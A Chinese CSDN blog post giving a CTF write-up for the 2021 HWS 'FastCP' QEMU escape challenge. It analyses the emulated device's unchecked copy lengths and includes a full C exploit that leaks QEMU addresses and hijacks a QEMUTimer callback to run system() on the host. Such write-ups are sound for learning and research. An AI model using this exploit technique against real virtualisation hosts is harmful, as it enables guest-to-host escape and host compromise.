qemu pwn 2021 HWS FastCP

最新推荐文章于 2023-06-12 20:34:25 发布
最新推荐文章于 2023-06-12 20:34:25 发布
阅读量642 收藏
点赞数
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/123824044
版权

启动脚本长这样。

#!/bin/sh

./qemu-system-x86_64 -initrd ./initramfs-busybox-x64.cpio.gz -nographic -kernel ./vmlinuz-5.0.5-generic -append "priority=low console=ttyS0" -monitor /dev/null --device FastCP

在这里插入图片描述
绿肯定是全绿

设备是FastCP

在这里插入图片描述
这是里面设备结构体的全貌
在这里插入图片描述里面还有一个叫CP_state的结构体
在这里插入图片描述三个参数

FastCP_realize函数中设置了一个定时器
定时器时间到了会调用fastcp_cp_timer函数
然后创建了一个mmio
在这里插入图片描述

fastcp_mmio_read
在这里插入图片描述功能0x00 返回opaque->handling
功能0x08 返回opaque->cp_state.CP_list_src
功能0x10 返回opaque->cp_state.CP_list_cnt
功能0x18 返回opaque->cp_state.cmd

fastcp_mmio_write
在这里插入图片描述功能0x08 给cp_list_src赋值
功能0x10 handing不是1的情况下给cp_list_cnt赋值
功能0x18 handing不是1的情况下给cp_list_cmd赋值然后调用timer

然后我们瞅瞅fastcp_cp_timer函数

void __fastcall fastcp_cp_timer(FastCPState *opaque)
{
  uint64_t v1; // rax
  uint64_t v2; // rdx
  __int64 v3; // rbp
  uint64_t v4; // r12
  uint64_t v5; // rax
  uint64_t v6; // rax
  bool v7; // zf
  uint64_t v8; // rbp
  __int64 v9; // rdx
  FastCP_CP_INFO cp_info; // [rsp+0h] [rbp-68h] BYREF
  char buf[8]; // [rsp+20h] [rbp-48h] BYREF
  unsigned __int64 v12; // [rsp+28h] [rbp-40h]
  unsigned __int64 v13; // [rsp+38h] [rbp-30h]

  v13 = __readfsqword(0x28u);
  v1 = opaque->cp_state.cmd;
  cp_info.CP_src = 0LL;
  cp_info.CP_cnt = 0LL;
  cp_info.CP_dst = 0LL;
  switch ( v1 )                                 // cp_state.cmd来做选择
  {
    case 2uLL:                                  // 选择2
      v7 = opaque->cp_state.CP_list_cnt == 1;   // v7是cp_list_cnt是不是1
      opaque->handling = 1;                     // handing置1
                                                // 也就是不再给计时器机会
      if ( v7 )                                 // 要求v7是1也就是cp_list_cnt不是1
      {                                         // cpu_physical_memory_rw(a1, a2, a3, 1);是将a2复制到a1,而cpu_physical_memory_rw(a1, a2, a3, 0);则将a1复制到a2
                                                // 但是要注意的是,cpu_physical_memory_rw的第一个参数为硬件地址,即物理地址,所以我们需要将qemu里面的虚拟地址,转化为物理地址。
        cpu_physical_memory_rw(opaque->cp_state.CP_list_src, &cp_info, 0x18uLL, 0);// 所以就list_src里面的复制0x18个字节到cp_info结构体
        if ( cp_info.CP_cnt <= 0x1000 )         // cp_cnt必须小于0x1000
                                                // 然后就可以把cp_info.cp_src中的复制到cp_buffer
          cpu_physical_memory_rw(cp_info.CP_src, opaque->CP_buffer, cp_info.CP_cnt, 0);
        v6 = opaque->cp_state.cmd & 0xFFFFFFFFFFFFFFFCLL;
        opaque->cp_state.cmd = v6;
        goto LABEL_11;                          // 然后拜拜
      }
      break;
    case 4uLL:
      v7 = opaque->cp_state.CP_list_cnt == 1;
      opaque->handling = 1;
      if ( v7 )                                 // cp_list_cnt还得不是1
      {                                         // 还是list_src写进去cp_info结构体
                                                // cp_buffer又能写cnt个到cp_dst
        cpu_physical_memory_rw(opaque->cp_state.CP_list_src, &cp_info, 0x18uLL, 0);
        cpu_physical_memory_rw(cp_info.CP_dst, opaque->CP_buffer, cp_info.CP_cnt, 1);// 这里没有对这个cnt有检查
        v6 = opaque->cp_state.cmd & 0xFFFFFFFFFFFFFFF8LL;
        opaque->cp_state.cmd = v6;              // 然后又拜拜
LABEL_11:
        if ( (v6 & 8) != 0 )                    // cmd要求是8
        {
          opaque->irq_status |= 0x100u;
          if ( msi_enabled(&opaque->pdev) )
            msi_notify(&opaque->pdev, 0);
          else
            pci_set_irq(&opaque->pdev, 1);
        }
        goto LABEL_16;                          // 但是走了这个地方之后又handing等于0了
                                                // 就又能启动timer了
      }
      break;
    case 1uLL:                                  // 功能1
      v2 = opaque->cp_state.CP_list_cnt;
      opaque->handling = 1;
      if ( v2 > 0x10 )                          // list_cnt根据0x10分一下
      {
LABEL_22:
        v8 = 0LL;
        do
        {
          v9 = 3 * v8++;                        // 它就24个字节循环一下
                                                // 控制cp_info结构体
                                                // 然后src写到buffer
                                                // 再从buffer读到dst
                                                // 但是仍然没有对CP_cnt进行设置
                                                // 就能改dst的话任意写。
          cpu_physical_memory_rw(opaque->cp_state.CP_list_src + 8 * v9, &cp_info, 0x18uLL, 0);
          cpu_physical_memory_rw(cp_info.CP_src, opaque->CP_buffer, cp_info.CP_cnt, 0);
          cpu_physical_memory_rw(cp_info.CP_dst, opaque->CP_buffer, cp_info.CP_cnt, 1);
        }
        while ( opaque->cp_state.CP_list_cnt > v8 );
      }
      else
      {
        if ( !v2 )                              // cnt不能是0
        {
LABEL_10:
          v6 = v1 & 0xFFFFFFFFFFFFFFFELL;
          opaque->cp_state.cmd = v6;
          goto LABEL_11;
        }
        v3 = 0LL;
        v4 = 0LL;
        while ( 1 )
        {
          cpu_physical_memory_rw(v3 + opaque->cp_state.CP_list_src, buf, 0x18uLL, 0);// 能写buf  能覆盖v12  v13
          if ( v12 > 0x1000 )                   // v12不能大于0x1000
            break;
          v5 = opaque->cp_state.CP_list_cnt;
          ++v4;
          v3 += 24LL;
          if ( v4 >= v5 )
          {
            if ( !v5 )                          // 这里似乎没啥用
              break;
            goto LABEL_22;
          }
        }
      }
      v1 = opaque->cp_state.cmd;
      goto LABEL_10;
    default:
      return;
  }
  opaque->cp_state.cmd = 0LL;
LABEL_16:
  opaque->handling = 0;
}

思路还是比较简单的
我们就正常越界读泄露基地址
劫持QEMUTimer结构体就行。

在这里插入图片描述在文件系统中拿到用户名密码
用户是root 没有密码

拿到id
在这里插入图片描述

解压打包脚本

mkdir exp
cp initramfs-busybox-x64.cpio.gz exp
cd exp
gunzip ./initramfs-busybox-x64.cpio.gz 
cpio -idmv < ./initramfs-busybox-x64.cpio
gcc -static exp.c -o exp
find . | cpio -o --format=newc > initramfs-busybox-x64.cpio
gzip initramfs-busybox-x64.cpio
cp initramfs-busybox-x64.cpio.gz ..

我们结合着调试看分步再看一下漏洞利用。

首先把buf填满
在这里插入图片描述

然从buf复制到buf
在这里插入图片描述首先要注意的是
我们读写超过了0x1000,所以需要申请两个页以上
但是因为虽然看似我们mmap(0x2000),但是他们的物理地址其实并不相连
所以我们首先第一步就是要重复mmap得到两个物理地址相连的页。

而且我们要注意写脚本过程中取泄露值的时候不能直接*(buf0 +0x201)
因为虽然物理地址上两个页是相连的,但是我们的exp利用的是qemu里面程序的虚拟地址,他俩并不连续,所以泄露地址我们应该直接用buf1

泄露程序基地址以及heap地址之后
然后就能拿到system的地址
以及一会写字符串的地址
在这里插入图片描述

然后就尝试去任意写覆盖QEMUTimer中的地址。
cb指针改成system
opaque改成写/bin/sh的地址

当然要体现把/bin/sh写进去。
在这里插入图片描述
最后触发timer_mod就可以。
在这里插入图片描述

exp

#include <assert.h>
#include <fcntl.h>
#include <inttypes.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>
#include<sys/io.h>

#define PAGE_SHIFT  12
#define PAGE_SIZE   (1 << PAGE_SHIFT)    //4096
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN     ((1ull << 55) - 1)


//cat /sys/devices/pci0000\:00/0000\:00\:04.0/resource0
uint32_t mmio_addr = 0xfea00000;
uint32_t mmio_size = 0x100000;
uint64_t *userbuf;
uint64_t phy_userbuf;
unsigned char* mmio_mem;
void die(const char* msg)
{
    perror(msg);
    exit(-1);
}

void* mem_map( const char* dev, size_t offset, size_t size )
{
    int fd = open( dev, O_RDWR | O_SYNC );
    if ( fd == -1 ) {
        return 0;
    }
    void* result = mmap( NULL, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, offset );
    if ( !result ) {
        return 0;
    }
    close( fd );
    return result;
}

uint64_t page_offset(uint64_t addr)
{
    return addr & ((1 << PAGE_SHIFT) - 1);
}

uint64_t gva_to_gfn(void *addr)
{
    uint64_t pme, gfn;
    size_t offset;

    int fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd < 0) {
        die("open pagemap");
    }
    offset = ((uintptr_t)addr >> 9) & ~7;
    lseek(fd, offset, SEEK_SET);
    read(fd, &pme, 8);
    if (!(pme & PFN_PRESENT))
        return -1;
    gfn = pme & PFN_PFN;
    return gfn;
}

uint64_t gva_to_gpa(void *addr)
{
    uint64_t gfn = gva_to_gfn(addr);
    assert(gfn != -1);
    return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);
}



uint8_t mmio_read(uint64_t addr)
{
    return *((uint64_t*) (mmio_mem+addr));
}

void mmio_write(uint64_t addr, uint64_t value)
{
    *( (uint64_t *) (mmio_mem+addr) ) = value;
}


void set_list_cnt(uint64_t cnt){
    mmio_write(0x10, cnt);
}

void set_src(uint64_t src){
    mmio_write(0x8, src);
}

void set_cmd(uint64_t cmd){
    mmio_write(0x18, cmd);
}

void set_read(uint64_t cnt){
    set_src(phy_userbuf);
    set_list_cnt(cnt);
    set_cmd(0x4);
    sleep(1);
}

void set_write(uint64_t cnt){
    set_src(phy_userbuf);
    set_list_cnt(cnt);
    set_cmd(0x2);
    sleep(1);
}

void set_read_write(uint64_t cnt){
    set_src(phy_userbuf);
    set_list_cnt(cnt);
    set_cmd(0x1);
    sleep(1);
}

uint64_t* buf0;
uint64_t* buf1;
//uint64_t* buf0, buf1;
size_t phy_buf0, phy_buf1;

void get_pages()
{
    size_t buf[0x1000];
    size_t arry[0x1000];
    size_t arr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_SHARED, 0, 0);
    *(char *)arr = 'a';
    int n = 0;
    buf[n] = gva_to_gfn(arr);
    arry[n++] = arr;
    for (int i = 1; i < 0x1000; i++)
    {
        arr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_SHARED, 0, 0);
        *(char *)arr = 'a';
        size_t fn = gva_to_gfn(arr);
        for (int j = 0; j < n; j++)
        {
            if (buf[j] == fn + 1 || buf[j] + 1 == fn)
            {
                if (fn > buf[j])
                {
                    buf0 = arry[j];
                    buf1 = arr;
                    phy_buf0 = (buf[j]<<12);
                }
                else
                {
                    buf1 = arry[j];
                    buf0 = arr;
                    phy_buf0 = (fn<<12);
                }
                return;
            }
        }
        buf[n] = fn;
        arry[n++] = arr;
    }
}

int main(int argc, char *argv[])
{
    system( "mknod -m 660 /dev/mem c 1 1" );
    mmio_mem = mem_map( "/dev/mem", mmio_addr, mmio_size );
    if ( !mmio_mem ) {
        die("mmap mmio failed");
    }
    userbuf = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
    mlock(userbuf, 0x1000);
    phy_userbuf=gva_to_gpa(userbuf);
    printf("user buff virtual address: %p\n",userbuf);
    printf("user buff physical address: %p\n",(void*)phy_userbuf);
    get_pages();
    memset(buf0, 'a', 0x1000);
    memset(buf1, 'a', 0x1000);
    mlock(buf0, 0x1000);
    mlock(buf1, 0x1000);
    phy_buf0=gva_to_gpa(buf0);
    phy_buf1=gva_to_gpa(buf1);
    printf("buf0 virtual address: %p\n",buf0);
    printf("phy_buf0 physical address: %p\n",(void*)phy_buf0);
    printf("buf1 virtual address: %p\n",buf1);
    printf("phy_buf1 physical address: %p\n",(void*)phy_buf1);

    //padding
    *(userbuf) = phy_buf0;
    *(userbuf + 1) = 0x1000;
    *(userbuf + 2) = 0xdeadbeef;
    set_write(1);

    //arbatiary read   
    //read QEMUTImer cb
    *(userbuf) = 0xdeadbeef;
    *(userbuf + 1) = 0x1020;
    *(userbuf + 2) = phy_buf0;
    set_read(1);

    uint64_t timer_list = *(buf1 + 0x1);
    uint64_t cb_addr = *(buf1 + 0x2);
    uint64_t heap_base = timer_list - 0x2456e0;
    uint64_t base_addr = cb_addr - 0x4dce80;
    uint64_t system_plt = base_addr + 0x2c2180;
    uint64_t buf_addr = heap_base + 0xf1dec0;
    printf("timer_list: %p\n",timer_list);
    printf("cb_addr: %p\n",cb_addr);
    printf("heap_base: %p\n",heap_base);
    printf("base_addr: %p\n",base_addr);
    printf("system_plt: %p\n",system_plt);
    printf("buf_addr: %p\n",buf_addr);

    //arbatiary write  
    //hijack QEMUTImer
    memset(buf0, 'b', 0x1000);
    //char *command="cat /root/flag\x00";
    char *command = "gnome-calculator\x00";
    memcpy(buf0 + 0x20,command,strlen(command) + 1);

    *(buf1 + 0x2) = system_plt;
    *(buf1 + 0x3) = buf_addr + 0x100;
    *(userbuf) = phy_buf0;
    *(userbuf + 1) = 0x1020;
    *(userbuf + 2) = phy_buf1;
    set_read_write(0x20);
    
    //get shell
    set_cmd(1);

    return 0;
}
yongbaoii
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
QEMU源码全解析 —— virtio(13)
phmatthaus的专栏
12-17 496
QEMU源码全解析 —— virtio(13)
qemu Windows版
02-11
qemu Windows版
Qemu KVM and Libvirt
04-29
虚拟化环境qemu 与libvirt的解析
转载:virtIO前后端notify机制详解
wujianyongw4的博客
02-17 557
本来这是在前端驱动后期分析的,但是这部分内容比较多,且分析了后端notify前端的机制,所以还是单独拿出一节分析比较好! 还是拿网络驱动部分做案例,网络驱动部分有两个队列,(忽略控制队列):接收队列和发送队列;每个队列都对应一个virtqueue,两个队列之间是互不影响的。 前后端利用virtqueue的方式如下图所示: 这里再详细的描述下,当两个queue都需要客户机填充buffer,...
qemu设备仿真---edu
qq_42138566的博客
05-30 388
qemu源码中自带edu仿真设备,用于教学。
Qemu 逃逸基础知识
sky123博客
06-12 1515
QEMU 与 KVM 的完整架构如下图所示。其中 VMX root 和 VMX non-root 都是 CPU 引入了支持硬件虚拟化的指令集 VT-x 之后出现的概念。虚拟机在 VMX root 模式和 VMX non-root 模式下都有 ring 0 到 ring 3 四个特权级别。
5.3Pci虚拟化
wanthelping的博客
07-26 2838
本节分析pci总线的虚拟化和qemu设备模型
qemu虚拟化转换工具
07-01
ova、ovf转qcow2等格式必备工具,支持vmware转换为华为云部署。ova、ovf转qcow2等格式必备工具,支持vmware转换为华为云部署。ova、ovf转qcow2等格式必备工具,支持vmware转换为华为云部署。ova、ovf转qcow2等格式...
QEMU虚拟机6.2.0源码
07-18
QEMU虚拟机2021年12月15日6.2.0版本源码
win-qemu-64
最新发布
12-17
在window11上使用qemu来安装虚拟机
从零开始搭建Ubuntu CTF-pwn环境
热门推荐
CoLin的pwn小屋
06-12 1万+
ctf pwn环境搭建(持续更新)
Linux开发——实战(二)Fast-cp快速拷贝项目
qq_25490573的博客
10-15 509
上截图:拷贝1个G文件 用时4秒 Fast-cp项目设计 1,记录当前系统时间 2,发起AIO读 3,等待AIO读结束后调用回调函数,发起AIO写 4,等待AIO写结束后调用回调函数,计算拷贝时间 5,拷贝完成,显示拷贝时间 文件操作 1文件的状态 2.文件属性 3.文件类型 4.文件权限 核心IO模块 辅助模块 <sys/types.h> &...
qemu中得到guest前端的通知处理后再发中断给前端
jason的笔记
04-21 1087
qemu/hw/virtio/virtio-pci.c 中定义定义了对配置空间的操作 static const MemoryRegionOps virtio_pci_config_ops = {     .read = virtio_pci_config_read,     .write = virtio_pci_config_write,     .impl = {        
qemu/kvm 桥接_QEMU / KVM网络机制
cuma2369的博客
07-28 587
qemu/kvm 桥接Introduction 介绍 As we know, network subsystems are important in computer systems since they are I/O systems and need to be optimized with many algorithms and skills. This article will intr...
XCTF 华为云专场 qemuzzz
yongbaoii的博客
01-27 584
绿 #! /bin/sh #gdb --args \ ./qemu-system-x86_64 \ -initrd ./rootfs.cpio \ -kernel ./bzImage \ -append 'console=ttyS0 root=/dev/ram oops=panic panic=1 quiet kalsr' \ -monitor /dev/null \ -m 64M --nographic \ -device zzz \ -L pc-bios 启动脚本 看起来设备叫zzz 去ida分析分.
超全面 | 裸机安装Ubuntu16.04+NVIDIA驱动410.78+CUDA10.0+cuDNN10.0+openCV3.4.2+相机驱动+yolov4+ROS+ORB-SLAM2+VINS
Chen_Tianyang的博客
08-12 1601
超全面 | 裸机安装Ubuntu16.04 + NVIDIA驱动410.78 + CUDA10.0 + cuDNN10.0 + openCV3.4.2 + 相机驱动 + yolov4 + ROS + ORB-SLAM2 + VINS 1 准备U盘启动盘 2 安装系统Ubuntu16.04 3 系统汉化+中文输入 4 安装google浏览器 5 安装NVIDIA驱动410.78 6 安装CUDA10.0 7 安装CUDA10.0 8 安装openCV3.4.2 9 安装相机驱动MYNT-EYE
ARM PWN 环境搭建和测试
u012655643的博客
11-29 3406
ARM PWN 环境搭建和测试 最近一次比赛(“骇极杯” 全国大学生信安邀请赛 )遇到了一道arm pwn的题目,题目不难,附上链接 baby_arm。我就想后面说不定也要做arm的题,就搭建一个环境吧。 手上刚好有个闲置的树莓派3b+,众所周知,树莓派是arm架构的,刚好拿来用。 树莓派装64位系统 都2018年了,怎么还在用32位系统呢? https://github.com/chainsx/...
linux kernel pwn系列(一)
weixin_41918450的博客
09-26 2760
kernel pwn题目不准备以总结的方式来写,准备每一道题做一个专门的分析。网上有不少exp,准备在他人的exp的基础上进行复现(因为能力不够所以在比赛时候做不出来,只能通过事后复现)计划写 强网杯core 和 solid_core,两道改编了csaw 2010kernel pwn的题目以及ciscn babydriver。总共三道题,入门kernel pwn绰绰有余。 第一篇主要介绍linux...
使用基于llvm的clang编译arm pwn题目以及arm pwn使用qemu调试脚本
fjh1997的博客
01-28 760
这里以starctf2021的babypac为例 https://github.com/sixstars/starctf2021/blob/main/pwn-babypac/main.c sudo apt install qemu-user sudo apt install gcc-aarch64-linux-gnu sudo apt install clang wget https://cdn.jsdelivr.net/gh/sixstars/starctf2021@main/pwn-babypac/ma
QEMUqemu通信
10-06
QEMU(Quick EMUlator)是一个用于虚拟化的开源软件,它可以模拟计算机硬件和运行操作系统。在使用DPDK应用程序和虚拟机之间进行直接通信时,需要使用定制的QEMU模拟器和一个额外的虚拟网络设备,即"virtio-net-ipc...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值